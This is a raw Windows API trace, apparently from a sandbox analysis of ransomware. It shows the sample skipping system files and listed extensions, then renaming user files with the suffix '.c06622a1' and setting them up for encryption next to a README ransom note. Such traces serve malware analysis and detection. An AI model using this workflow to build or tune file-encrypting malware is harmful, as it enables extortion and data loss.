[0168.043] wcslen (_String="diagcab") returned 0x7 [0168.043] _wcsicmp (_Str1="diagcfg", _Str2="search-ms") returned -15 [0168.043] wcslen (_String="diagcfg") returned 0x7 [0168.043] _wcsicmp (_Str1="diagpkg", _Str2="search-ms") returned -15 [0168.043] wcslen (_String="diagpkg") returned 0x7 [0168.043] _wcsicmp (_Str1="dll", _Str2="search-ms") returned -15 [0168.043] wcslen (_String="dll") returned 0x3 [0168.043] _wcsicmp (_Str1="drv", _Str2="search-ms") returned -15 [0168.043] wcslen (_String="drv") returned 0x3 [0168.043] _wcsicmp (_Str1="exe", _Str2="search-ms") returned -14 [0168.043] wcslen (_String="exe") returned 0x3 [0168.043] _wcsicmp (_Str1="hlp", _Str2="search-ms") returned -11 [0168.043] wcslen (_String="hlp") returned 0x3 [0168.043] _wcsicmp (_Str1="icl", _Str2="search-ms") returned -10 [0168.043] wcslen (_String="icl") returned 0x3 [0168.044] _wcsicmp (_Str1="icns", _Str2="search-ms") returned -10 [0168.044] wcslen (_String="icns") returned 0x4 [0168.044] _wcsicmp (_Str1="ico", _Str2="search-ms") returned -10 [0168.044] wcslen (_String="ico") returned 0x3 [0168.044] _wcsicmp (_Str1="ics", _Str2="search-ms") returned -10 [0168.044] wcslen (_String="ics") returned 0x3 [0168.044] _wcsicmp (_Str1="idx", _Str2="search-ms") returned -10 [0168.044] wcslen (_String="idx") returned 0x3 [0168.044] _wcsicmp (_Str1="ldf", _Str2="search-ms") returned -7 [0168.044] wcslen (_String="ldf") returned 0x3 [0168.044] _wcsicmp (_Str1="lnk", _Str2="search-ms") returned -7 [0168.044] wcslen (_String="lnk") returned 0x3 [0168.044] _wcsicmp (_Str1="mod", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="mod") returned 0x3 [0168.044] _wcsicmp (_Str1="mpa", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="mpa") returned 0x3 [0168.044] _wcsicmp (_Str1="msc", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="msc") returned 0x3 [0168.044] _wcsicmp (_Str1="msp", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="msp") returned 0x3 [0168.044] _wcsicmp (_Str1="msstyles", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="msstyles") returned 0x8 [0168.044] _wcsicmp (_Str1="msu", _Str2="search-ms") returned -6 [0168.044] wcslen (_String="msu") returned 0x3 [0168.044] _wcsicmp (_Str1="nls", _Str2="search-ms") returned -5 [0168.044] wcslen (_String="nls") returned 0x3 [0168.044] _wcsicmp (_Str1="nomedia", _Str2="search-ms") returned -5 [0168.044] wcslen (_String="nomedia") returned 0x7 [0168.044] _wcsicmp (_Str1="ocx", _Str2="search-ms") returned -4 [0168.045] wcslen (_String="ocx") returned 0x3 [0168.045] _wcsicmp (_Str1="prf", _Str2="search-ms") returned -3 [0168.045] wcslen (_String="prf") returned 0x3 [0168.045] _wcsicmp (_Str1="ps1", _Str2="search-ms") returned -3 [0168.045] wcslen (_String="ps1") returned 0x3 [0168.045] _wcsicmp (_Str1="rom", _Str2="search-ms") returned -1 [0168.045] wcslen (_String="rom") returned 0x3 [0168.045] _wcsicmp (_Str1="rtp", _Str2="search-ms") returned -1 [0168.045] wcslen (_String="rtp") returned 0x3 [0168.045] _wcsicmp (_Str1="scr", _Str2="search-ms") returned -2 [0168.045] wcslen (_String="scr") returned 0x3 [0168.045] _wcsicmp (_Str1="shs", _Str2="search-ms") returned 3 [0168.045] wcslen (_String="shs") returned 0x3 [0168.045] _wcsicmp (_Str1="spl", _Str2="search-ms") returned 11 [0168.045] wcslen (_String="spl") returned 0x3 [0168.045] _wcsicmp (_Str1="sys", _Str2="search-ms") returned 20 [0168.045] wcslen (_String="sys") returned 0x3 [0168.045] _wcsicmp (_Str1="theme", _Str2="search-ms") returned 1 [0168.045] wcslen (_String="theme") returned 0x5 [0168.045] _wcsicmp (_Str1="themepack", _Str2="search-ms") returned 1 [0168.045] wcslen (_String="themepack") returned 0x9 [0168.045] _wcsicmp (_Str1="wpx", _Str2="search-ms") returned 4 [0168.045] wcslen (_String="wpx") returned 0x3 [0168.045] _wcsicmp (_Str1="lock", _Str2="search-ms") returned -7 [0168.045] wcslen (_String="lock") returned 0x4 [0168.045] _wcsicmp (_Str1="key", _Str2="search-ms") returned -8 [0168.045] wcslen (_String="key") returned 0x3 [0168.045] _wcsicmp (_Str1="hta", _Str2="search-ms") returned -11 [0168.046] wcslen (_String="hta") returned 0x3 [0168.046] _wcsicmp (_Str1="msi", _Str2="search-ms") returned -6 [0168.046] wcslen (_String="msi") returned 0x3 [0168.046] _wcsicmp (_Str1="pdb", _Str2="search-ms") returned -3 [0168.046] wcslen (_String="pdb") returned 0x3 [0168.046] _wcsicmp (_Str1="sqlite", _Str2="search-ms") returned 12 [0168.046] wcslen (_String="sqlite") returned 0x6 [0168.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0168.046] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.047] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0168.047] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 0x2a [0168.047] wcscpy (in: _Dest=0x321009e, _Source="Everywhere.search-ms" | out: _Dest="Everywhere.search-ms") returned="Everywhere.search-ms" [0168.047] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0168.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.048] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.048] ReadFile (in: hFile=0x1a8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.049] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xd70d7633 [0168.049] RtlComputeCrc32 (PartialCrc=0x7633, Buffer=0x32ec24, Length=0x80) returned 0x128debe7 [0168.049] RtlComputeCrc32 (PartialCrc=0xebe7, Buffer=0x32ec24, Length=0x80) returned 0x4a1cd176 [0168.049] RtlComputeCrc32 (PartialCrc=0xd176, Buffer=0x32ec24, Length=0x80) returned 0x77fe9b0e [0168.049] RtlComputeCrc32 (PartialCrc=0x9b0e, Buffer=0x32ec24, Length=0x80) returned 0xed7e55b9 [0168.049] CloseHandle (hObject=0x1a8) returned 1 [0168.049] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.049] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0168.049] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 0x3f [0168.049] wcscpy (in: _Dest=0x32200ce, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.049] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.c06622a1"), dwFlags=0x8) returned 1 [0168.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0168.060] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.060] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x126b65f2 [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd9823e1 [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62e9ecf9 [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x493e7967 [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77a0c40a [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23b5c75b [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7e8d70a [0168.065] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x542be55d [0168.068] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x2f51884c [0168.068] RtlComputeCrc32 (PartialCrc=0x884c, Buffer=0x710094, Length=0x80) returned 0xfb08092f [0168.068] RtlComputeCrc32 (PartialCrc=0x92f, Buffer=0x710094, Length=0x80) returned 0x5e92b95a [0168.068] RtlComputeCrc32 (PartialCrc=0xb95a, Buffer=0x710094, Length=0x80) returned 0xf82b8ada [0168.068] RtlComputeCrc32 (PartialCrc=0x8ada, Buffer=0x710094, Length=0x80) returned 0xa07d8f45 [0168.069] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.069] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.069] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.069] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0168.069] _wcsicmp (_Str1="Indexed Locations.search-ms", _Str2="README.c06622a1.TXT") returned -9 [0168.069] wcsstr (_Str="Indexed Locations.search-ms", _SubStr="README") returned 0x0 [0168.069] _wcsicmp (_Str1="autorun.inf", _Str2="Indexed Locations.search-ms") returned -8 [0168.069] wcslen (_String="autorun.inf") returned 0xb [0168.069] _wcsicmp (_Str1="boot.ini", _Str2="Indexed Locations.search-ms") returned -7 [0168.069] wcslen (_String="boot.ini") returned 0x8 [0168.069] _wcsicmp (_Str1="bootfont.bin", _Str2="Indexed Locations.search-ms") returned -7 [0168.069] wcslen (_String="bootfont.bin") returned 0xc [0168.069] _wcsicmp (_Str1="bootsect.bak", _Str2="Indexed Locations.search-ms") returned -7 [0168.069] wcslen (_String="bootsect.bak") returned 0xc [0168.069] _wcsicmp (_Str1="desktop.ini", _Str2="Indexed Locations.search-ms") returned -5 [0168.069] wcslen (_String="desktop.ini") returned 0xb [0168.069] _wcsicmp (_Str1="iconcache.db", _Str2="Indexed Locations.search-ms") returned -11 [0168.069] wcslen (_String="iconcache.db") returned 0xc [0168.069] _wcsicmp (_Str1="ntldr", _Str2="Indexed Locations.search-ms") returned 5 [0168.069] wcslen (_String="ntldr") returned 0x5 [0168.069] _wcsicmp (_Str1="ntuser.dat", _Str2="Indexed Locations.search-ms") returned 5 [0168.069] wcslen (_String="ntuser.dat") returned 0xa [0168.069] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Indexed Locations.search-ms") returned 5 [0168.069] wcslen (_String="ntuser.dat.log") returned 0xe [0168.069] _wcsicmp (_Str1="ntuser.ini", _Str2="Indexed Locations.search-ms") returned 5 [0168.069] wcslen (_String="ntuser.ini") returned 0xa [0168.069] _wcsicmp (_Str1="thumbs.db", _Str2="Indexed Locations.search-ms") returned 11 [0168.069] wcslen (_String="thumbs.db") returned 0x9 [0168.069] _wcsicmp (_Str1="386", _Str2="search-ms") returned -64 [0168.069] wcslen (_String="386") returned 0x3 [0168.069] _wcsicmp (_Str1="adv", _Str2="search-ms") returned -18 [0168.070] wcslen (_String="adv") returned 0x3 [0168.070] _wcsicmp (_Str1="ani", _Str2="search-ms") returned -18 [0168.070] wcslen (_String="ani") returned 0x3 [0168.070] _wcsicmp (_Str1="bat", _Str2="search-ms") returned -17 [0168.070] wcslen (_String="bat") returned 0x3 [0168.070] _wcsicmp (_Str1="bin", _Str2="search-ms") returned -17 [0168.070] wcslen (_String="bin") returned 0x3 [0168.070] _wcsicmp (_Str1="cab", _Str2="search-ms") returned -16 [0168.070] wcslen (_String="cab") returned 0x3 [0168.070] _wcsicmp (_Str1="cmd", _Str2="search-ms") returned -16 [0168.070] wcslen (_String="cmd") returned 0x3 [0168.070] _wcsicmp (_Str1="com", _Str2="search-ms") returned -16 [0168.070] wcslen (_String="com") returned 0x3 [0168.070] _wcsicmp (_Str1="cpl", _Str2="search-ms") returned -16 [0168.070] wcslen (_String="cpl") returned 0x3 [0168.070] _wcsicmp (_Str1="cur", _Str2="search-ms") returned -16 [0168.070] wcslen (_String="cur") returned 0x3 [0168.070] _wcsicmp (_Str1="deskthemepack", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="deskthemepack") returned 0xd [0168.070] _wcsicmp (_Str1="diagcab", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="diagcab") returned 0x7 [0168.070] _wcsicmp (_Str1="diagcfg", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="diagcfg") returned 0x7 [0168.070] _wcsicmp (_Str1="diagpkg", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="diagpkg") returned 0x7 [0168.070] _wcsicmp (_Str1="dll", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="dll") returned 0x3 [0168.070] _wcsicmp (_Str1="drv", _Str2="search-ms") returned -15 [0168.070] wcslen (_String="drv") returned 0x3 [0168.070] _wcsicmp (_Str1="exe", _Str2="search-ms") returned -14 [0168.070] wcslen (_String="exe") returned 0x3 [0168.070] _wcsicmp (_Str1="hlp", _Str2="search-ms") returned -11 [0168.070] wcslen (_String="hlp") returned 0x3 [0168.070] _wcsicmp (_Str1="icl", _Str2="search-ms") returned -10 [0168.070] wcslen (_String="icl") returned 0x3 [0168.070] _wcsicmp (_Str1="icns", _Str2="search-ms") returned -10 [0168.071] wcslen (_String="icns") returned 0x4 [0168.071] _wcsicmp (_Str1="ico", _Str2="search-ms") returned -10 [0168.071] wcslen (_String="ico") returned 0x3 [0168.071] _wcsicmp (_Str1="ics", _Str2="search-ms") returned -10 [0168.071] wcslen (_String="ics") returned 0x3 [0168.071] _wcsicmp (_Str1="idx", _Str2="search-ms") returned -10 [0168.071] wcslen (_String="idx") returned 0x3 [0168.071] _wcsicmp (_Str1="ldf", _Str2="search-ms") returned -7 [0168.071] wcslen (_String="ldf") returned 0x3 [0168.071] _wcsicmp (_Str1="lnk", _Str2="search-ms") returned -7 [0168.071] wcslen (_String="lnk") returned 0x3 [0168.071] _wcsicmp (_Str1="mod", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="mod") returned 0x3 [0168.071] _wcsicmp (_Str1="mpa", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="mpa") returned 0x3 [0168.071] _wcsicmp (_Str1="msc", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="msc") returned 0x3 [0168.071] _wcsicmp (_Str1="msp", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="msp") returned 0x3 [0168.071] _wcsicmp (_Str1="msstyles", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="msstyles") returned 0x8 [0168.071] _wcsicmp (_Str1="msu", _Str2="search-ms") returned -6 [0168.071] wcslen (_String="msu") returned 0x3 [0168.071] _wcsicmp (_Str1="nls", _Str2="search-ms") returned -5 [0168.071] wcslen (_String="nls") returned 0x3 [0168.071] _wcsicmp (_Str1="nomedia", _Str2="search-ms") returned -5 [0168.071] wcslen (_String="nomedia") returned 0x7 [0168.071] _wcsicmp (_Str1="ocx", _Str2="search-ms") returned -4 [0168.071] wcslen (_String="ocx") returned 0x3 [0168.071] _wcsicmp (_Str1="prf", _Str2="search-ms") returned -3 [0168.071] wcslen (_String="prf") returned 0x3 [0168.071] _wcsicmp (_Str1="ps1", _Str2="search-ms") returned -3 [0168.071] wcslen (_String="ps1") returned 0x3 [0168.071] _wcsicmp (_Str1="rom", _Str2="search-ms") returned -1 [0168.071] wcslen (_String="rom") returned 0x3 [0168.072] _wcsicmp (_Str1="rtp", _Str2="search-ms") returned -1 [0168.072] wcslen (_String="rtp") returned 0x3 [0168.072] _wcsicmp (_Str1="scr", _Str2="search-ms") returned -2 [0168.072] wcslen (_String="scr") returned 0x3 [0168.072] _wcsicmp (_Str1="shs", _Str2="search-ms") returned 3 [0168.072] wcslen (_String="shs") returned 0x3 [0168.072] _wcsicmp (_Str1="spl", _Str2="search-ms") returned 11 [0168.072] wcslen (_String="spl") returned 0x3 [0168.072] _wcsicmp (_Str1="sys", _Str2="search-ms") returned 20 [0168.072] wcslen (_String="sys") returned 0x3 [0168.072] _wcsicmp (_Str1="theme", _Str2="search-ms") returned 1 [0168.072] wcslen (_String="theme") returned 0x5 [0168.072] _wcsicmp (_Str1="themepack", _Str2="search-ms") returned 1 [0168.072] wcslen (_String="themepack") returned 0x9 [0168.072] _wcsicmp (_Str1="wpx", _Str2="search-ms") returned 4 [0168.072] wcslen (_String="wpx") returned 0x3 [0168.072] _wcsicmp (_Str1="lock", _Str2="search-ms") returned -7 [0168.072] wcslen (_String="lock") returned 0x4 [0168.072] _wcsicmp (_Str1="key", _Str2="search-ms") returned -8 [0168.072] wcslen (_String="key") returned 0x3 [0168.072] _wcsicmp (_Str1="hta", _Str2="search-ms") returned -11 [0168.072] wcslen (_String="hta") returned 0x3 [0168.072] _wcsicmp (_Str1="msi", _Str2="search-ms") returned -6 [0168.072] wcslen (_String="msi") returned 0x3 [0168.072] _wcsicmp (_Str1="pdb", _Str2="search-ms") returned -3 [0168.072] wcslen (_String="pdb") returned 0x3 [0168.072] _wcsicmp (_Str1="sqlite", _Str2="search-ms") returned 12 [0168.072] wcslen (_String="sqlite") returned 0x6 [0168.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0168.072] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.072] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0168.073] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 0x2a [0168.073] wcscpy (in: _Dest=0x321009e, _Source="Indexed Locations.search-ms" | out: _Dest="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0168.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0168.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0168.086] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.086] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.087] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x87464942 [0168.087] RtlComputeCrc32 (PartialCrc=0x4942, Buffer=0x32ec24, Length=0x80) returned 0xa540aa3d [0168.087] RtlComputeCrc32 (PartialCrc=0xaa3d, Buffer=0x32ec24, Length=0x80) returned 0x9fc4970d [0168.087] RtlComputeCrc32 (PartialCrc=0x970d, Buffer=0x32ec24, Length=0x80) returned 0xe26e4318 [0168.087] RtlComputeCrc32 (PartialCrc=0x4318, Buffer=0x32ec24, Length=0x80) returned 0x7cab2480 [0168.087] CloseHandle (hObject=0x1b8) returned 1 [0168.087] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.087] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0168.087] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 0x46 [0168.087] wcscpy (in: _Dest=0x32200dc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.087] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.c06622a1"), dwFlags=0x8) returned 1 [0168.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0168.096] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.096] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10917cff [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x280c8bfd [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51361307 [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6997644c [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8ad7d1a [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11ce3853 [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c730136 [0168.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29a4b336 [0168.105] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x870ede53 [0168.105] RtlComputeCrc32 (PartialCrc=0xde53, Buffer=0x710094, Length=0x80) returned 0x3e3bfebe [0168.105] RtlComputeCrc32 (PartialCrc=0xfebe, Buffer=0x710094, Length=0x80) returned 0x1bba6f8e [0168.105] RtlComputeCrc32 (PartialCrc=0x6f8e, Buffer=0x710094, Length=0x80) returned 0x6518370f [0168.105] RtlComputeCrc32 (PartialCrc=0x370f, Buffer=0x710094, Length=0x80) returned 0x98066221 [0168.105] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.106] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.107] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d09780, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91d09780, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91d09780, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0168.107] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0168.107] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.107] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0168.109] _wcsicmp (_Str1="backup", _Str2="Searches") returned -17 [0168.109] wcslen (_String="backup") returned 0x6 [0168.109] _wcsicmp (_Str1="bak", _Str2="Searches") returned -17 [0168.109] wcslen (_String="bak") returned 0x3 [0168.109] _wcsicmp (_Str1="back", _Str2="Searches") returned -17 [0168.109] wcslen (_String="back") returned 0x4 [0168.109] _wcsicmp (_Str1="archive", _Str2="Searches") returned -18 [0168.109] wcslen (_String="archive") returned 0x7 [0168.109] _wcsicmp (_Str1="bckp", _Str2="Searches") returned -17 [0168.109] wcslen (_String="bckp") returned 0x4 [0168.109] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0168.109] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 